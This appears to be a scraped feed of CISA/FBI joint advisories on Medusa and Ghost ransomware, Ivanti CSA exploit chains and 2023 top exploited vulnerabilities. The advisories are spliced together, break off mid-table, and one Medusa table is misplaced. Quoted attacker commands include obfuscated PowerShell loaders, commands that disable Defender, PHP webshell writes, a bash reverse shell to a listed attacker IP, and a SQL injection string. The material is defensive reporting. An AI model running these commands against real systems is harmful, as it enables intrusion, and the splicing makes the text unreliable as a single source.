Exploitation of unpatched software vulnerabilities [T1190] through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and Fortinet EMS SQL injection vulnerability [CVE-2023-48788 [CWE 89: SQL Injection].

Discovery

Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include:

21 (FTP)
22 (SSH)
23 (Telnet)
80 (HTTP)
115 (SFTP)
443 (HTTPS)
1433 (SQL database)
3050 (Firebird database)
3128 (HTTP web proxy)
3306 (MySQL database)
3389 (RDP)

Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information.

Defense Evasion

Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress.

Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].

In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.

powershell -exec bypass -enc <base64 encrypted command string>

In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].

powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)

In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload.

powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((
New-Object System.IO.StreamReader(
New-Object System.IO.Compression.GzipStream((
New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(
(('<base64 payload string>')-f'<character replacement 0>','<character replacement 1>', '<character replacement 2>')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell.

In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].

FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:

Ligolo.
- A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.
Cloudflared.
- Formerly known as ArgoTunnel.
- Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.

Lateral Movement and Execution

Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to:

Copy (-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s).
Execute an already existing local file on a remote machine with SYSTEM level privileges.
Execute remote shell commands using cmd /c.

One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389:

netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow

Then, a rule to allow remote WMI connections is created:

netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

Finally, the registry is modified to allow Remote Desktop connections:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement.

Exfiltration and Encryption

Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070].

Extortion

Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.

Indicators of Compromise

Table 1 lists the hashes of malicious files obtained during investigations.

*Table 1: Malicious Files*
Files	Hash (MD5)	Description
!!!READ_ME_MEDUSA!!!.txt	Redacted	Ransom note file
openrdp.bat	44370f5c977e415981febf7dbb87a85c	Allows incoming RDP and remote WMI connections
pu.exe	80d852cd199ac923205b61658a9ec5bc	Reverse shell

Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.

*Table 2: Medusa Email Addresses*
Email Addresses	Description
key.medusa.serviceteam@protonmail.com	Used for ransom negotiation
medusa.support@onionmail.org	Used for ransom negotiation
mds.svt.breach@protonmail.com	Used for ransom negotiation
mds.svt.mir2@protonmail.com	Used for ransom negotiation
MedusaSupport@cock.li	Used for ransom negotiation

MITRE ATT&CK Tactics and Techniques

See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

*Table 3: Initial Access*
Technique Title	ID	Use
Exploit Public-Facing Application	T1190	Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.
Initial Access	TA0001	Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.
Phishing	T1566	Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.

#StopRansomware: Ghost (Cring) Ransomware

Wed, 19 Feb 2025 16:38:21 +0000

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.

Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.

The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.

Download the PDF version of this report:

AA25-050A #StopRansomware: Ghost (Cring) Ransomware (PDF, 735.18 KB )

For a downloadable copy of IOCs, see:

AA25-050A STIX XML (XML, 78.67 KB )

AA25-050A STIX XML (Additional IOCs) (XML, 74.01 KB )

AA25-050A STIX JSON (JSON, 68.47 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16.1. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain).

Execution

Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.

Persistence

Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers.

Privilege Escalation

Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001].

Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.

See Table 1 for a descriptive listing of tools.

Credential Access

Ghost actors use the built in Cobalt Strike function “hashdump” or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.

Defense Evasion

Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.

Discovery

Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as “SharpShares” for network share discovery [T1135], and “Ladon 911” and “SharpNBTScan” for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.

Lateral Movement

Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA… [T1132.001][T1564.003].

This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.

In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.

Exfiltration

Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data.

Command and Control

Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address.

For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.

Note: Table 2 contains a list of Ghost ransom email addresses.

Impact and Encryption

Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [T1486]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.

These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486].

The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.

Indicators of Compromise (IOC)

Table 1 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.

Note: Authors of these tools generally state that they should not be used in illegal activity.

*Table 4: Defense Evasion*
Technique Title	ID	Use
Indicator Removal: Clear Command History	T1070.003	Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.
Obfuscated Files or Information: Encrypted/Encoded File	T1027.013	Medusa actors use a well-known evasion technique that executes a base64 encrypted command.
Obfuscated Files or Information	T1027	Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.
Indicator Removal	T1070	Medusa actors deleted their previous work and tools installed.

*Table 1: Tools Leveraged by Ghost Actors*
Name	Description	Source
Cobalt Strike	Cobalt Strike is penetration testing software. Ghost actors use an unauthorized version of Cobalt Strike.	N/A
IOX	Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device.	github[.]com/EddieIvan01/iox
SharpShares.exe	SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery.	github[.]com/mitchmoser/SharpShares
SharpZeroLogon.exe	SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller.	github[.]com/leitosama/SharpZeroLogon
SharpGPPPass.exe	SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords.	N/A
SpnDump.exe	SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration.	N/A
NBT.exe	A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration.	github[.]com/BronzeTicket/SharpNBTScan
BadPotato.exe	BadPotato.exe is an exploitation tool used for privilege escalation.	github[.]com/BeichenDream/BadPotato
God.exe	God.exe is a compiled version of GodPotato and is used for privilege escalation.	github[.]com/BeichenDream/GodPotato
HFS (HTTP File Server)	A portable web server program that Ghost actors use to host files for remote access and exfiltration.	rejitto[.]com/hfs
Ladon 911	A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144.	github[.]com/k8gege/Ladon
Web Shell	A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.	Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx

*Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity*
File name	MD5 File Hash
Cring.exe	c5d712f82d5d37bb284acd4468ab3533
Ghost.exe	34b3009590ec2d361f07cac320671410 d9c019182d88290e5489cdf3b607f982
ElysiumO.exe	29e44e8994197bdb0c2be6fc5dfc15c2 c9e35b5c1dc8856da25965b385a26ec4 d1c5e7b8e937625891707f8b4b594314
Locker.exe	ef6a213f59f3fbee2894bd6734bbaed2
iex.txt, pro.txt (IOX)	ac58a214ce7deb3a578c10b97f93d9c3
x86.log (IOX)	c3b8f6d102393b4542e9f951c9435255 0a5c4ad3ec240fbfd00bdc1d36bd54eb
sp.txt (IOX)	ff52fdf84448277b1bc121f592f753c5
main.txt (IOX)	a2fd181f57548c215ac6891d000ec6b9
isx.txt (IOX)	625bd7275e1892eac50a22f8b4a6355d
sock.txt (IOX)	db38ef2e3d4d8cb785df48f458b35090

Ransom Email Addresses

Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes.

Email Addresses

asauribe@tutanota.com ghostbackup@skiff.com rainbowforever@tutanota.com

cringghost@skiff.com

ghosts1337

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Wed, 15 Jan 2025 17:26:11 +0000

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]

Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.

Download the PDF version of this report:

AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 756.92 KB )

For a downloadable copy of IOCs, see:

AA25-022A STIX XML (XML, 105.56 KB )

AA25-022A STIX JSON (JSON, 76.91 KB )

Technical Details

In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3]
CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

Exploit Chain 1

The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.

After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].

In one confirmed compromise, the threat actors tried to create webshells using two different paths:

echo "<?php system(@
\$_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php
echo "<?php system('/bin/sudo '. @
\$_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.

In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.

Lateral Movement

In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

Exploit Chain 2

In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.

After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.

After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.

Detection of Activity

According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

Victim Organization 1

The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

Victim Organization 2

This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.

Victim Organization 3

This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

Indicators of Compromise

See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

*Table 1: IP Address Used for Credential Theft, September 2024*
File Name	IP Address	Description
"/client/index.php%3f.php/gsb/datetime.php	142.171.217[.]195	/var/log/messages
"/client/index.php%3f.php/gsb/datetime.php	154.64.226[.]166	/var/log/messages-20240904.gz
"/client/index.php%3f.php/gsb/datetime.php	216.131.75[.]53
"/client/index.php%3f.php/gsb/datetime.php	23.236.66[.]97	/var/log/messages-20240905.gz
"/client/index.php%3f.php/gsb/datetime.php	38.207.159[.]76	/var/log/messages-20240906.gz

*Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024*
File Name	IP Address	Description
	149.154.167[.]41
	95.161.76[.]100
hxxps://file.io/E50vtqmJP5aa
hxxps://file.io/RBKuU8gicWt
hxxps://file.io/frdZ9L18R7Nx
hxxp://ip.sb
hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis
	142.171.217[.]195
	108.174.199[.]200
	206.189.156[.]69
	108.174.199[.]200/Xa27efd2.tmp
	142.171.217[.]195

Type IOC Description

Ipv4 107.173.89[.]16

Ipv4 38.207.159[.]76

Ipv4 142.171.217[.]195

Ipv4 154.64.226[.]166

Ipv4 156.234.193[.]18

Ipv4 216.131.75[.]53

Ipv4 205.169.39[.]11

Ipv4 23.236.66[.]97

Ipv4 149.154.176[.]41

Ipv4 95.161.76[.]100

Ipv4 142.171.217[.]195

Ipv4 108.174.199[.]200

Ipv4 206.189.156[.]69

Ipv4 142.171.217[.]195

Ipv4 67.217.228[.]83

Ipv4 203.160.72[.]174

Ipv4

2023 Top Routinely Exploited Vulnerabilities

Fri, 08 Nov 2024 21:04:23 +0000

Summary

The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):

United States: The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA)
Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
Canada: Canadian Centre for Cyber Security (CCCS)
New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
United Kingdom: National Cyber Security Centre (NCSC-UK)

This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.

The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors.

Vendors, designers, and developers. Implement secure by design and default principles and tactics to reduce the prevalence of vulnerabilities in your software.
- Follow the SP 800-218 Secure Software Development Framework (SSDF) and implement secure by design practices into each stage of the software development life cycle (SDLC). Establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.
- Prioritize secure by default configurations, such as eliminating default passwords and not requiring additional configuration changes to enhance product security.
- Ensure that published CVEs include the proper CWE field, identifying the root cause of the vulnerability.
End-user organizations:
- Apply timely patches to systems.
  Note: If CVEs identified in this advisory have not been patched, check for signs of compromise before patching.
- Implement a centralized patch management system.
- Use security tools such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.
- Ask your software providers to discuss their secure by design program, provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.

Purpose

The authoring agencies developed this document in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

Download the PDF version of this report:

AA24-317A 2023 Top Routinely Exploited Vulnerabilities (PDF, 907.24 KB )

Technical Details

Key Findings

In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.

